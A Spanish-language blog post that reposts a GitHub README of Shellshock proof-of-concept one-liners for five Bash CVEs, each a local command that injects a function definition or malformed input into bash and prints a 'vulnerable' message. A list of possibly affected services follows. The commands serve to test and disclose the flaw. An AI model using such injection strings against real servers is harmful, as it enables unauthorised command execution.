This page looks best with JavaScript enabled

Shellshocker - Repository of "Shellshock" Proof of Concept Code

 ·   ·   2 min read

Shellshocker! atack!

=======================

Tras todo el revuelo de la semana pasada por la vulnerabilidad identificada en Bash conocida como #ShellShocker,  los PoC no se hecharon de menos con ella y @_mubix se puso manos a la obra y se monto un lindo README en GITHUB en el cual esta actualizando constantemente sobre los PoC’s identificados, hoy 30 de Septiembre copypasteo dicho README, para ver nuevas actualizaciones no dejen de ingresar al repositorio aquí pues basta con dar una revisada de ellos**,** y probar no esta demás.

Collection of Proof of Concepts and Potential Targets for #ShellShocker

Wikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details
Please submit a pull request if you have more links or other resources
Speculation:(Non-confirmed possibly vulnerable)

If you know of PoCs for any of these, please submit an issue or pull request with a link.

Command Line (Linux, OSX, and Windows via Cygwin)

CVE-2014-6271

+env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

will create a file named echo in cwd with date in it, if vulnerable

  • env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

  • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

  • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6277

  • foo='() { echo "CVE-2014-6277 vulnerable"; }' bash -c foo

IBM z/OS -

HTTP

DHCP

SSH

OSX

SIP

Qmail

FTP

TMNT

Disfruten y jueguen con ello sin hacer daño ;).

Regards,
Snifer

Share on
Support the author with

Avatar
WRITTEN BY